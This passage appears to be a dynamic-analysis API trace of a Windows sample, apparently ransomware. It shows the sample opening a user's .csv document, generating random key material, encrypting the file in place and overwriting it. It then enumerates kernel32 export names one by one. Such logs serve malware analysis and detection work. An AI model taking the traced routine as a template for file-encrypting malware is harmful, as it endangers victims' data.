lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0083.762] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="94tBqj 9I.csv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\94tBqj 9I.csv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\94tBqj 9I.csv" [0083.762] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.762] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\94tBqj 9I.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\94tbqj 9i.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0083.762] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=17033) returned 1 [0083.762] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0083.762] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0083.762] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0083.763] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0083.763] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.763] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0083.763] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.764] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.764] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0083.764] CloseHandle (hObject=0x414) returned 1 [0083.764] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.764] WriteFile (in: hFile=0x410, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0083.765] CloseHandle (hObject=0x0) returned 0 [0083.765] CloseHandle (hObject=0x410) returned 1 [0083.765] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.765] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.765] GetTickCount () returned 0x114d682 [0083.765] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.766] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.766] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0083.766] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.766] lstrlenA (lpString="kernel32.dll") returned 12 [0083.766] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.766] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.766] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.766] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.766] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.767] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.767] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.767] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.767] lstrlenA (lpString="ADDATOMA") returned 8 [0083.767] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.767] lstrlenA (lpString="ADDATOMW") returned 8 [0083.767] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.767] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.767] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.767] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.767] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.767] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.767] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.767] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.767] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.767] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.767] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.767] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.767] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.767] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.767] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.767] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.767] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.767] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.767] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.767] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.767] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.767] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.767] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.767] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.767] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.767] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.767] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.767] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.767] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.767] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.767] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.768] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.768] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.768] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.768] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.768] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.768] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.768] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.768] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.768] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.768] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.768] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.768] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.768] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.768] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.768] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.768] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.768] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.768] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.768] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.768] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.768] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.768] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.768] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.768] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.768] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.768] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.769] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.769] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.769] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.769] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.769] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.769] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.769] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.769] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.769] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.769] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.769] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.769] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.769] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.769] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.769] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.769] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.769] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.769] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.769] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.769] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.769] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.769] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.769] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.769] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.769] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.769] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.769] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.769] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.769] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.769] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.769] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.769] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.770] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.770] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.770] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.770] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.770] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.770] lstrlenA (lpString="BEEP") returned 4 [0083.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.770] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.770] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.770] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.770] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.770] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.770] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.770] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.770] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.770] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.770] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.770] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.770] lstrlenA (lpString="CANCELIO") returned 8 [0083.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.770] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.770] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.771] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.771] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.771] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.771] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.771] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.771] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.771] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.771] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.771] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.771] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.771] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.771] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.771] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.771] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.771] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.771] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.771] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.771] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.771] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.771] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.771] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.771] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.771] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.771] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.771] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.771] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.771] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.771] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.771] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.771] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.771] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.771] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.771] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.771] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.771] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.771] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.771] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.772] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.772] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.772] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.772] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.772] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.772] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.772] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.772] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.772] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.772] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.772] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.772] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.772] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.772] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.772] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.772] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.772] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.772] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.772] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: 